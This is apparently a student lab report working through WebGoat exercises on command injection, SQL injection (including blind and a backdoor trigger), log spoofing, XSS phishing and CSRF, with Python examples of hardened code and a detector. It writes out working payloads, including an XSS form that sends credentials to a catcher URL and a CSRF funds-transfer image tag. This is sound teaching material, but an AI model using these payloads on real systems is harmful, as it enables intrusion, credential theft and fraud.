20165214 2018-2019-2 "Network Warfare Technology" Exp9 Web Security Infrastructure Week 13

I. Experiment objectives and content

  • 1. Exercise content

    • (1) The goal of this exercise is to understand the basic principles of common web attack techniques by completing no fewer than seven topics, covering SQL injection, XSS and CSRF, using the corresponding exercises in WebGoat.
  • 2. Questions

    • (1) The principle of SQL injection attacks, and how to defend against them
    • A: A SQL injection vulnerability is a security flaw in the way a web application's back end builds and processes database queries. Because the application embeds user input directly into SQL commands without checking the input for special strings, an attacker can craft input that forms an attack. The back end then executes the injected text as a normal SQL command, which lets the attacker perform arbitrary operations on the back-end database and can even lead to serious consequences such as destruction of the database. Defenses: do not allow the submission of strings containing special characters, and encrypt the database contents.

    • (2) The principle of XSS attacks, and how to defend against them
    • A: Wherever a site accepts ordinary text input, JavaScript is entered instead, and the script is then executed by the page. Defenses: check for special characters when a form is submitted; to eliminate XSS vulnerabilities from a site, web developers escape special characters as a security measure.

    • (3) The principle of CSRF attacks, and how to defend against them
    • A: This kind of malicious use of a website is popularly known as a phishing site. Although it sounds like cross-site scripting (XSS), it is quite different: XSS exploits the user's trust in a site, whereas CSRF disguises a request as coming from a trusted user in order to exploit the site's trust in that user. Compared with XSS, CSRF attacks are less well known (so resources for guarding against them are quite scarce) and hard to defend against, which is why they are considered more dangerous than XSS. Defenses: use a CAPTCHA on every important form submission page; have the web server embed a token in each page, submit the token with the form, and check it on the server; if the token does not match, the request is judged to be a CSRF attack. Clear cookies regularly, or even avoid using cookies.

II. Experimental procedure

Installing WebGoat

  • WebGoat is a platform developed by the OWASP organization for experimenting with web application vulnerabilities; it demonstrates the security flaws that exist in web applications. WebGoat runs on any platform with a Java virtual machine and currently provides more than 30 training lessons, including cross-site scripting (XSS), access control, thread safety, manipulating hidden fields, parameter manipulation, weak session cookies, blind SQL injection, numeric SQL injection, string SQL injection, web services, failures of open authentication, dangerous HTML comments and so on. WebGoat offers a series of tutorials for learning web security; some lessons also come with video demonstrations that guide the user in exploiting these vulnerabilities.

  • 1. From https://github.com/WebGoat/WebGoat/releases/tag/7.0.1 download webgoat-container-7.0.1-war-exec.jar and copy it into Kali.

  • 2. At the command line run java -jar webgoat-container-7.0.1-war-exec.jar to start WebGoat; after a short wait the following prompt appears, indicating that it started successfully.

  • 3. In the browser enter http://localhost:8080/WebGoat to reach the WebGoat login page.

  • 4. Log in with any of the account/password pairs listed at the bottom of the page; the following page appears:

  • 5. Next, choose the corresponding exercise from the options on the left.

Injection Flaws (various injection vulnerabilities)

1. Command Injection

  • Description: command injection means submitting additional commands through an input such as a text box so that they are executed on the server after submission, achieving the attacker's purpose.

  • (1) First, the page shows a selection box with many options, all of which are legitimate.

  • (2) What we have to do is modify the page source so that one of the options has some extra instructions appended; by selecting the modified option and clicking View, the desired effect is achieved.

  • (3) Right-click the page and select Inspect Element to view and edit the page source. Double-click the code of any option in the selection box and append "& pwd".

  • (4) Select that option and click View: the appended command is executed successfully and the attack succeeds.

2. Numeric SQL Injection

  • Description: by appending additional logical conditions to the value submitted from the form, one bypasses the intended restrictions without authorization and obtains more data than permitted.

  • (1) On the first page we see a simple weather query: select a city in the selection box, click Go, and the weather for the selected city is shown. Only four options are offered.

  • (2) We can guess that the database statement behind it looks up the row whose number matches the selected city and then outputs that city's weather.

  • (3) Right-click the page, select Inspect Element to view the page source, find the selection box, double-click value="102" and append or 1=1 to it.

  • (4) Select the city and click Go. The weather for all cities is output, including two that were not among the options. The attack succeeds.
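The lesson works because the submitted station number is concatenated into the SQL text. The following Python/sqlite3 example is added here and is not WebGoat's code: it uses a constructed weather table (made-up station numbers and cities) to contrast the concatenating query with a hardened version that allow-lists the form's values and binds the parameter.

```python
import sqlite3

# Constructed stand-in for the lesson's weather table; station numbers and
# cities are made up here, not taken from WebGoat. Two rows are deliberately
# absent from the "dropdown" to mirror the hidden cities the lesson exposes.
ROWS = [
    (101, "Columbia", "Sunny"),
    (102, "Seattle", "Rain"),
    (103, "New York", "Cloudy"),
    (104, "Houston", "Hot"),
    (10001, "Camp David", "Classified"),
    (11111, "Ice Station Zero", "Frozen"),
]
DROPDOWN = ("101", "102", "103", "104")   # the only values the form offers

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE weather_data (station INTEGER, name TEXT, forecast TEXT)")
    conn.executemany("INSERT INTO weather_data VALUES (?, ?, ?)", ROWS)
    return conn

def lookup_vulnerable(conn, station):
    # The submitted value is pasted into the SQL text, so "102 or 1=1"
    # turns the WHERE clause into  station = 102 or 1=1  and matches all rows.
    sql = "SELECT name, forecast FROM weather_data WHERE station = " + station
    return conn.execute(sql).fetchall()

def lookup_hardened(conn, station):
    # Layer 1: the form only ever offers four values, so anything else is
    # a tampered request and is refused outright.
    if station not in DROPDOWN:
        raise ValueError("station not in allowed list: %r" % station)
    # Layer 2: even an allowed value is bound as a parameter, never
    # concatenated, so the engine treats it as data and not as SQL syntax.
    sql = "SELECT name, forecast FROM weather_data WHERE station = ?"
    return conn.execute(sql, (int(station),)).fetchall()

if __name__ == "__main__":
    db = make_db()
    print(lookup_vulnerable(db, "102"))          # one row
    print(lookup_vulnerable(db, "102 or 1=1"))   # all six rows, hidden ones included
    print(lookup_hardened(db, "102"))            # one row
    try:
        lookup_hardened(db, "102 or 1=1")
    except ValueError as exc:
        print("rejected:", exc)
```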

3. Log Spoofing

  • Description: after carrying out a web attack, attackers tend to leave traces of the attack in the log file. By spoofing the log, entries can be forged to conceal or erase those traces.

  • (1) Fill in the username zwy%0d%0aLogin Succeeded for username: admin, where %0d%0a is the URL-encoded ASCII carriage return and line feed, and any password. Click Login and the following information appears.

  • (2) It looks as if the admin account logged in, but this entry is false. An attacker could use the same technique to add a malicious script to the log file. For example, enter admin <script>alert(document.cookie)</script> as the username and submit; when the administrator views the log page, a message box showing the cookie pops up.
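Both halves of the lesson (the forged line and the script in the log viewer) come down to writing untrusted input into the log verbatim. The following Python example is added here and is not WebGoat's code; it uses the two inputs above, constructed locally, to show a control-character escape for log writing and HTML escaping for the viewer.

```python
import html
import re
from urllib.parse import unquote

# Constructed inputs that mirror the lesson: the first forges a second log
# line via CR/LF, the second plants a script tag for the log viewer to render.
CRLF_INPUT = unquote("zwy%0d%0aLogin Succeeded for username: admin")
HTML_INPUT = "admin <script>alert(document.cookie)</script>"

CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")

def log_line_vulnerable(username):
    # The raw username is written verbatim, so an embedded CR/LF starts a
    # new line and the forged text reads like a genuine separate entry.
    return "Login failed for username: " + username

def sanitize_for_log(value):
    # Replace every control character with a visible escape so one user
    # input can never occupy more than one log line.
    return CONTROL_CHARS.sub(lambda m: "\\x%02x" % ord(m.group(0)), value)

def log_line_hardened(username):
    return "Login failed for username: " + sanitize_for_log(username)

def render_for_viewer(line):
    # Second half of the defence: log text shown in a web page is
    # HTML-escaped at output time, so a stored <script> is displayed, not run.
    return html.escape(line)

def entry_count(log_text):
    # A log reader that splits on newlines reports how many entries it sees.
    return len(log_text.splitlines())
```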

4. LAB: SQL Injection

  • This lab has four stages, but Stage 2 and Stage 4 apply only to the WebGoat developer version.

  • Stage 1: String SQL Injection

    • The goal is to bypass the login.

    • (1) First, try selecting the administrator and entering the password ' or '1' = '1. When entering it we find that the password field has a length limit: ' or '1' = '1 is 13 characters long, while the password box limits input to 8.

    • (2) From this we can tell that the page source needs to be modified.

    • (3) Right-click the page, select Inspect Element to view and edit the page source, and change the password field's maximum length to 13.

    • (4) Enter ' or '1' = '1 in the password box again; this time it is not restricted. After clicking Login the following prompt appears and the attack succeeds.

  • Stage 3: Numeric SQL Injection

    • Objective: using the identity of the employee Larry, view the information of the boss, Neville.

    • (1) First use the Stage 1 method to bypass the login and view Larry's information.

    • (2) Right-click the page, select Inspect Element to view the page source, and find the code of the option box for Larry Stooge.

    • (3) The relevant person's information is looked up by the value attribute. In general the boss has the highest salary and the salary field is usually named salary, so modify the value to 101 or 1=1 order by salary desc and click ViewProfile; the boss's information is returned and the attack succeeds.

5. String SQL Injection

  • (1) This page lets you query a user's credit card number. It is relatively simple, and the principle is similar to the numeric injection above.

  • (2) Enter ' or 1=1-- as the user name in the box and click Go; all users' credit card numbers are returned.

6. Database Backdoors

  • (1) Goal: create a database backdoor. Try to inject commands while entering the id to query, giving yourself a pay raise at the same time.

  • (2) What is a database backdoor? Databases are often used as the back end of web applications, and they also serve as a storage medium, so they can be used to store malicious activity as well, such as triggers. A trigger is a database operation that the DBMS calls in response to another operation on the database, such as a CRUD operation. For example, an attacker can create a trigger so that every time a new user is created, that user's salary is increased by 10000.

  • (3) This page takes a user id and returns that user's information. Enter 101 and search; the current salary is shown as 55,000.

  • (4) Enter 101; update employee set salary=66666 to change the salary to 66666.

  • (5) Enter 101;CREATE TRIGGER myBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET Salary=NEW.Salary+10000 WHERE userid = NEW.userid to complete the attack.

  • Note: CREATE TRIGGER myBackDoor creates the backdoor, and BEFORE INSERT means it fires before each insert, so this statement adds 10,000 to a new employee's salary before the new row is stored in the database.

7. Blind Numeric SQL Injection

  • Description: when a SQL injection returns no explicit information, the injection is called blind.

  • Goal: find the value of the pin field in the record of the pins table whose cc_number is 1111222233334444. The pin field is an int.

  • (1) The page lets you enter an account number and checks whether it is valid. If the account exists it reports valid, otherwise invalid, for example:

  • (2) Here we can use AND: when both sides of the AND are true the page reports valid, otherwise it reports invalid.

  • (3) The next step is to use a database statement to find the pin. Enter 101 AND ((SELECT pin FROM pins WHERE cc_number='1111222233334444') > 5000 ) in the text box. It reports invalid, indicating that the pin is ≤ 5000.

  • (4) Then, by repeated binary search, the pin is found to be 2364.

8. Blind String SQL Injection

  • Goal: similar to 7, but here the pin field is a varchar.

  • (1) Again use AND. First enter 101 AND (LENGTH(SELECT name FROM pins WHERE cc_number='4321432143214321') < 5) to test the length of the pin. The result is displayed.

  • (2) Continuing to try, the length is found to be 4.

  • (3) Next enter 101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='4321432143214321'), [n], [n]) < 'H' ) to confirm the n-th letter one by one. The tedious process is not listed here. Finally the pin field is found to be Jill.
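Blind injection of the kind used in lessons 7 and 8 leaves a distinctive footprint on the server side: one client sends the same endpoint a stream of requests whose parameter contains AND with a nested SELECT and a comparison constant that keeps changing. The following Python detector is added here (not WebGoat's code) and runs over constructed access-log lines shaped like those probes; the log format and the client addresses are assumptions.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines, not real WebGoat output. 10.0.0.9 walks the
# pin value with the AND (SELECT ...) comparisons from lessons 7 and 8;
# 10.0.0.5 does ordinary lookups; 10.0.0.7 sends a single probe.
Q = "/WebGoat/attack?Screen=2&menu=1100&account_number="
PROBE = "101%20AND%20((SELECT%20pin%20FROM%20pins%20WHERE%20cc_number%3D%271111222233334444%27)%20%3E%20"
LOG_LINES = [
    '10.0.0.5 "GET ' + Q + '101 HTTP/1.1" 200',
    '10.0.0.9 "GET ' + Q + PROBE + '5000) HTTP/1.1" 200',
    '10.0.0.5 "GET ' + Q + '102 HTTP/1.1" 200',
    '10.0.0.9 "GET ' + Q + PROBE + '2500) HTTP/1.1" 200',
    '10.0.0.7 "GET ' + Q + PROBE + '5000) HTTP/1.1" 200',
    '10.0.0.9 "GET ' + Q + PROBE + '1250) HTTP/1.1" 200',
    '10.0.0.9 "GET ' + Q + '101%20AND%20(SUBSTRING((SELECT%20name%20FROM%20pins%20WHERE%20cc_number%3D%274321432143214321%27),1,1)%20%3C%20%27H%27) HTTP/1.1" 200',
]

LINE_RE = re.compile(r'(\S+) "GET (\S+) HTTP')
# A boolean probe: a plausible id, then AND with a nested SELECT.
BOOLEAN_PROBE = re.compile(r"\bAND\b.*\(\s*SELECT\b", re.IGNORECASE | re.DOTALL)
# The constant the probe compares against; it moves on every request.
COMPARISON_CONST = re.compile(r"[<>]=?\s*'?(\w+)'?\s*\)")

def parse_line(line):
    # Returns (client, decoded account_number parameter).
    m = LINE_RE.match(line)
    ip, target = m.group(1), m.group(2)
    value = parse_qs(urlsplit(target).query).get("account_number", [""])[0]
    return ip, value

def is_boolean_probe(value):
    # Legitimate submissions are bare numbers and never match.
    return bool(BOOLEAN_PROBE.search(value))

def find_enumerators(lines, min_probes=3):
    probes = Counter()
    constants = defaultdict(set)
    for line in lines:
        ip, value = parse_line(line)
        if is_boolean_probe(value):
            probes[ip] += 1
            constants[ip].update(COMPARISON_CONST.findall(value))
    # Blind enumeration = repeated probes whose comparison constant keeps
    # moving (binary search); one stray probe alone does not trip the rule.
    return sorted(ip for ip, n in probes.items()
                  if n >= min_probes and len(constants[ip]) >= 2)
```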

Cross-Site Scripting (XSS)

1. Phishing with XSS

  • Description and principle: by modifying the page source, a fake form backed by a script is presented to the user; as long as the user enters information and submits it, the entered data is sent to a page of the attacker's choosing.

  • (1) Right-click the page, select Inspect Element to view and edit the page source, double-click any part of it and insert the following: </form><script>function hack(){ XSSImage=new Image; XSSImage.src="http://localhost/WebGoat/catcher?PROPERTY=yes&user="+ document.phish.user.value + "&password=" + document.phish.pass.value + ""; alert("Had this been a real attack... Your credentials were just stolen. User Name = " + document.phish.user.value + "Password = " + document.phish.pass.value);} </script><form name="phish"><br><br><HR><H3>This feature requires account login:</H3 ><br><br>Enter Username:<br><input type="text" name="user"><br>Enter Password:<br><input type="password" name = "pass"><br><input type="submit" name="login" value="login" onclick="hack()"></form><br><br><HR>

  • (2) Submit the search; the following interface appears.

  • (3) Enter anything and click Submit.

4. Cross Site Request Forgery (CSRF)

  • (1) Introduction: the attack works by making the victim load a web page that contains an image.

  • (2) The Screen and menu parameter values shown on the right are 294 and 900 respectively.

  • (3) Enter any title, and for the content enter <img src="http://localhost:8080/WebGoat/attack?Screen=294&menu=900&transferFunds=5000" width="1" height="1" /> and submit.

  • (4) A link appears below; click it. The CSRF event is triggered and the attack succeeds.
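The image request succeeds because the browser attaches the victim's session cookie and the server asks for nothing else. The following Python example, added here and not WebGoat's code, implements the token check described in the question section above: the token is an HMAC over the session id, and the parameter name csrf_token and the session ids are assumptions.

```python
import hashlib
import hmac
import secrets
from urllib.parse import parse_qs, urlsplit

# Constructed server-side secret; in a real deployment it lives only on the server.
SERVER_SECRET = secrets.token_bytes(32)

def issue_csrf_token(session_id):
    # The token is an HMAC over the session id. The server can recompute it
    # for the cookie it receives, but a page on another origin (the forum
    # post carrying the <img> tag) cannot read it out of the victim's browser.
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()

def is_valid_csrf_token(session_id, submitted):
    if submitted is None:
        return False
    return hmac.compare_digest(issue_csrf_token(session_id), submitted)

def handle_transfer(session_id, url):
    # session_id stands for the session cookie the browser attaches
    # automatically, which is exactly what the forged image request rides on.
    params = parse_qs(urlsplit(url).query)
    if "transferFunds" not in params:
        return "ignored"
    token = params.get("csrf_token", [None])[0]
    if not is_valid_csrf_token(session_id, token):
        return "rejected"      # cookie present, token absent or wrong
    return "transferred %s" % params["transferFunds"][0]

# The lesson's image-tag URL: the victim's cookie comes along, the token does not.
FORGED_URL = "http://localhost:8080/WebGoat/attack?Screen=294&menu=900&transferFunds=5000"

def legitimate_url(session_id):
    # What the site's own form produces: the same request plus the token
    # that was embedded in the page served to this session.
    return FORGED_URL + "&csrf_token=" + issue_csrf_token(session_id)
```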

III. Problems encountered

  • 1. After starting WebGoat, the left-hand column did not show the corresponding entries.
  • Solution: this turned out to be a JDK version mismatch. Downloading JDK 1.8 and setting the environment variables solved the problem. Reference: https://www.jianshu.com/p/9ec7838411c8

IV. Reflections

  • Through this experiment I learned about injection attacks, XSS attacks and CSRF attacks, understood the principles behind them and made some simple attempts. Although the study was not very in-depth, it broadened my knowledge well.

Source: www.cnblogs.com/zhuwenyuan/p/10925501.html